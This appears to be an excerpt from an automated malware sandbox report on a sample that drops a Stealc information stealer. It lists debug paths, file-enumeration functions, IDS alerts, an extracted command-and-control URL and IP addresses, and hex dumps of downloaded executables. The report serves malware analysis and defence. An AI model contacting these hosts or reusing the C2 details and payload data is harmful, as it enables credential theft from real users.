                              Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb| source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3034111147.0000020EEB9D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
                              Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\STDHash\obj\Release\STDHash.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
                              Source: Binary string: mozglue.pdb source: u5qk.0.exe, 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmp
                              Source: Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UniversalInstaller.pdb source: run.exe, 00000003.00000002.1992656537.0000000000D3C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000003.00000000.1907137804.0000000000D3C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000E.00000002.2294114402.0000000000D3C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000E.00000000.2231681830.0000000000D3C000.00000002.00000001.01000000.00000009.sdmp
                              Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Telemetry\obj\Release\Telemetry.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3044464664.0000020EEBE00000.00000004.08000000.00040000.00000000.sdmp
                              Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
                              Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb^ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
                              Source: Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3045117994.0000020EEC0C0000.00000004.08000000.00040000.00000000.sdmp
                              Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Downloader\obj\Release\Downloader.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3021461752.0000020EEAA30000.00000004.08000000.00040000.00000000.sdmp
                              Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\STDHash\obj\Release\STDHash.pdb@=Z= L=_CorDllMainmscoree.dll source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
                              Source: Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\relay.pdb source: run.exe, 00000003.00000002.1995525658.000000006C9F7000.00000002.00000001.01000000.0000000A.sdmp, run.exe, 0000000E.00000002.2357108993.000000006C417000.00000002.00000001.01000000.0000000A.sdmp
                              Source: Binary string: EntitlementDefinitions.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3024035894.0000020EEB370000.00000004.08000000.00040000.00000000.sdmp
                              Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_en-us\obj\Release\Locale_en-us.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3021663380.0000020EEAA60000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
                              Source: Binary string: C:\velup.pdb source: VucRf0jboS.exe, 00000000.00000002.2368707088.000000000421E000.00000004.00000020.00020000.00000000.sdmp, VucRf0jboS.exe, 00000000.00000000.1700705502.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                              Source: Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdbSHA256M$ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3045117994.0000020EEC0C0000.00000004.08000000.00040000.00000000.sdmp
                              Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdbjD source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3021509972.0000020EEAA40000.00000004.08000000.00040000.00000000.sdmp
                              Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ko-kr\obj\Release\Locale_ko-kr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
                              Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdbF source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
                              Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdbf source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
                              Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb. source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
                              Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
                              Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3030420251.0000020EEB7A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_it-it\obj\Release\Locale_it-it.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
                              Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3021555558.0000020EEAA50000.00000004.08000000.00040000.00000000.sdmp
                              Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3021509972.0000020EEAA40000.00000004.08000000.00040000.00000000.sdmp
                              Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3030420251.0000020EEB7A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3034111147.0000020EEB9D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
                              Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb4 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3021555558.0000020EEAA50000.00000004.08000000.00040000.00000000.sdmp
                              Source: Binary string: C:\keyoy_nutanikitibaha.pdb source: VucRf0jboS.exe, 00000000.00000003.1758649321.0000000005DC1000.00000004.00000020.00020000.00000000.sdmp, u5qk.0.exe, 00000001.00000000.1756183454.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                              Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ja-jp\obj\Release\Locale_ja-jp.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
                              Source: Binary string: wntdll.pdbUGP source: run.exe, 00000003.00000002.1994925905.0000000003F6F000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000003.00000002.1995197239.0000000004779000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000003.00000002.1995035449.00000000042C0000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2324295539.000000000468E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2325072403.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2329148115.0000000003E60000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2330673814.0000000004313000.00000004.00000001.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2327093725.0000000003B05000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524471270.0000000004D60000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524115301.000000000488D000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: /_/obj/Release/TelemetryChannel/net452/Microsoft.AI.ServerTelemetryChannel.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3044688870.0000020EEC0A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E9001C000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3032814487.0000020EEB850000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E9007E000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: SMCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3027055139.0000020EEB550000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveSDK\obj\Debug\PerceiveSDK.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3027055139.0000020EEB550000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: c:\Users\dahall\Documents\Visual Studio 2010\Projects\TaskService\obj\Release\Microsoft.Win32.TaskScheduler.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
                              Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
                              Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
                              Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Win32TaskScheduler\obj\Release\Win32TaskScheduler.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
                              Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdbR source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
                              Source: Binary string: nss3.pdb source: u5qk.0.exe, 00000001.00000002.2570415319.000000006BC8F000.00000002.00000001.01000000.00000011.sdmp
                              Source: Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\Perceive\obj\Debug\Perceive.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3027055139.0000020EEB550000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
                              Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_zh-tw\obj\Release\Locale_zh-tw.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00412570
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_0040D1C0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_004015C0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_004015C0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,1_2_00411650
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,1_2_0040B610
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,1_2_0040DB60
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_00411B80
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040D540
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,1_2_004121F0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeCode function: 3_2_6C8F261E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,3_2_6C8F261E
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeFile opened: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeFile opened: C:\Users\user\AppData\Local\Temp\u5qk.2Jump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeFile opened: C:\Users\user\AppData\LocalJump to behavior

                              Networking

                              barindex
                              Source: TrafficSnort IDS: 2856233 ETPRO TROJAN Win32/Unknown Loader Related Activity (GET) 192.168.2.4:49730 -> 185.172.128.90:80
                              Source: TrafficSnort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.4:49733 -> 185.172.128.76:80
                              Source: TrafficSnort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.4:49733 -> 185.172.128.76:80
                              Source: TrafficSnort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 185.172.128.76:80 -> 192.168.2.4:49733
                              Source: TrafficSnort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.4:49733 -> 185.172.128.76:80
                              Source: TrafficSnort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 185.172.128.76:80 -> 192.168.2.4:49733
                              Source: Malware configuration extractorURLs: 185.172.128.76/3cd2b41cbde8fc9c.php
                              Source: Malware configuration extractorURLs: http://185.172.128.76/3cd2b41cbde8fc9c.php
                              Source: global trafficTCP traffic: 91.215.85.66 ports 1,4,5,6,7,15647
                              Source: Yara matchFile source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20e901eeb15.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20eeb550000.16.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20e901749f0.2.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20e900c6ca8.3.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee882432f.6.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee8848739.2.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee87fd525.5.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000011.00000002.3027055139.0000020EEB550000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                              Source: global trafficTCP traffic: 192.168.2.4:49753 -> 91.215.85.66:15647
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Apr 2024 23:31:12 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 26 Apr 2024 23:30:02 GMTETag: "47e00-617084867e629"Accept-Ranges: bytesContent-Length: 294400Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 0f 14 d4 08 4b 75 ba 5b 4b 75 ba 5b 4b 75 ba 5b 46 27 65 5b 55 75 ba 5b 46 27 5a 5b c3 75 ba 5b 46 27 5b 5b 64 75 ba 5b 42 0d 29 5b 48 75 ba 5b 4b 75 bb 5b 3b 75 ba 5b fe eb 5f 5b 4a 75 ba 5b 46 27 61 5b 4a 75 ba 5b fe eb 64 5b 4a 75 ba 5b 52 69 63 68 4b 75 ba 5b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d0 34 51 64 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0c 00 00 1a 01 00 00 3c c2 03 00 00 00 00 02 41 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 80 c3 03 00 04 00 00 80 e4 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 93 01 00 28 00 00 00 00 f0 c1 03 88 68 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 c3 03 54 14 00 00 00 32 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 88 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 90 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 93 18 01 00 00 10 00 00 00 1a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e4 6c 00 00 00 30 01 00 00 6e 00 00 00 1e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 48 4c c0 03 00 a0 01 00 00 72 01 00 00 8c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 88 68 01 00 00 f0 c1 03 00 6a 01 00 00 fe 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 54 14 00 00 00 60 c3 03 00 16 00 00 00 68 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Apr 2024 23:31:17 GMTContent-Type: application/x-msdos-programContent-Length: 1106998Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 